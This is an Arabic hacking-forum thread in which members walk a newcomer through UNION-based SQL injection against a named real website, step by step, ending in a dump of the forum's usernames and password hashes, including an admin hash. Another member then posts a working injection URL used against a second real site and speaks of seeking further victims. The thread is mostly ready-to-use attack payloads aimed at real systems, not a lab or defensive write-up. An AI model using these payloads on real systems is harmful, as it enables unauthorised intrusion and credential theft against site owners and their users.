:: vBspiders Professional Network ::

:: vBspiders Professional Network :: (http://www.vbspiders.com/vb/index.php)

- SQL قواعد البيانات (http://www.vbspiders.com/vb/forumdisplay.php?f=133)

- - مساعدة (http://www.vbspiders.com/vb/showthread.php?t=41996)

Mr-Ip
بارك الله فيك على جهود ياغالي تلخط ياغالي من الضمن الستا user_password وفي استعلامات كثير
smilies12

كود PHP:

   http://www.skms.net/past.php?id=65 and 1=-0+union+select+unhex(hex(Group_concat(table_name,0x3a,column_name,0x3a,table_schema))),2,3,4,5+from+information_schema.columns+Where+table_name=0x666f72756d5f7573657273--

لو تذكر كلامي الي الاخ hacker2020
ابيك تجرب واحد واحد وبحث في الملفات كلها واحد واحد ممكن تحصل اشياء ثانية ابيه يركز كثير في الحقن

اقدمك تحياتي

يعطيك العافية اخي خالد ومستر ايبي على مساعدة الاخ

[align=center]الله يعينكو علية[/align]

اقتباس:

المشاركة الأصلية كتبت بواسطة hacker2020 (المشاركة 288868)

لك من احلاة تقيم بس أريد شرح كامل اوك وشكرا على المجهود الجيد دة

خالد سعودي

ولايهمك ياغالي
ولكن تابع الدورة اوكي
يالله نبدا
بسم الله الرحمن الرحيم
من اصدارالقاعدة

كود PHP:

   http://www.skms.net/past.php?id=65 and 1=-0+union+select+1,version(),3,4,5+from+information_schema.columns--

بعدين نضع الامر هذا في مكان اصدار القاعدةversion()

كود PHP:

   concat(table_name,0x3a,column_name,0x3a,table_schema)

يصبح الرابط

كود PHP:

   http://www.skms.net/past.php?id=65 and 1=-0+union+select+1,concat(table_name,0x3a,column_name,0x3a,table_schema),3,4,5+from+information_schema.columns--

تمام باقي علينا لباسبودWhere+column_name+LIKE باس مشفرة من فيرفوكس
الظاهر انك تعرف كيف تجيبه
يصبح الرابط

كود PHP:

   http://www.skms.net/past.php?id=65 and 1=-0+union+select+1,Group_concat(table_name,0x3a,column_name,0x3a,table_schema),3,4,5+from+information_schema.columns+Where+column_name+LIKE+CHAR(37, 112, 97, 115, 37)--

تلاحظ ان في الحقنه موجودGroup_ وهي تعرض الجميع لي في الجدوال
وطلع لك جميع لي في الجدوال وتبحث فيهم واحد واحد خينا ناخذ واحد منهو مثل phpbb_users
نشفيرها الموقع هذا وهو من الاساسيات

كود PHP:

   http://www.waraxe.us/sql-char-encoder.html

ممكن انك تعرف الموقع كيف يستخدام اذكانت ماتعرف قولي واحسن شي انك التابع الدورة sql في المنتدي وتركز فيها
يصبح الرابط

كود PHP:

   http://www.skms.net/past.php?id=65 and 1=-0+union+select+1,Group_concat(table_name,0x3a,column_name,0x3a,table_schema),3,4,5+from+information_schema.columns+Where+table_name=0x70687062625f7573657273--

طلعتلك الستا تجرب فيهم علما user_id عضو مافي فائدة منه تبحث عن الباسورد او اليوز نيم من هذا قبيل
خلينا ناخذ واحد منهم username+user_password

يصبح الرابط

كود PHP:

   http://www.skms.net/past.php?id=65 and 1=-0+union+select+1,Group_concat(username,0x3a,user_password),3,4,5+from+phpbb_users--

admin:61b19b269cc521c8e15bbadb4dfe49a7
انا حولت فك الباس ولكن ما فك معي
:a14: والله طلع من الاختبارات وكتبت الموضوع وانااسف على التاخير يا غالي
في النهاية تتركك في فمان الرحمن ولكن كم اقولك تابع الدورة في المنتدي وركز عليه
تقييم

[align=center]والله فى الاول انا احب اشكر الاخوة عبد الصمد-mr-ip-خالد سعودى على المعلمات القيمة دة

وبلنسبة لكلامك اخلا خالد سعودى انتا والله انسان تستحق التقدير انتا وباقى المشرفين والاعضاء

وانا هتابع الدورة ولية باك بس اتمنة تشرفونى على الاميل بتاع وشكرا اخوااانى على المجهود دة[/align]

[align=center]ولكم باك على احلاة ناس

كلامك طلع صح ودى النتيجة

http://www.orthops.si/clanki-ona.php?id=65 and 1=-0+union+select+concat(username,0x3a,password),2,3+ from+uporabniki--[/align]

اقتباس:

المشاركة الأصلية كتبت بواسطة hacker2020 (المشاركة 289462)

مبدع ياغالي ولكن لوانك كاتب الموضوع في قسم الانجازات
موفق

[align=center]أوك اومرك بس ضحية تانية[/align]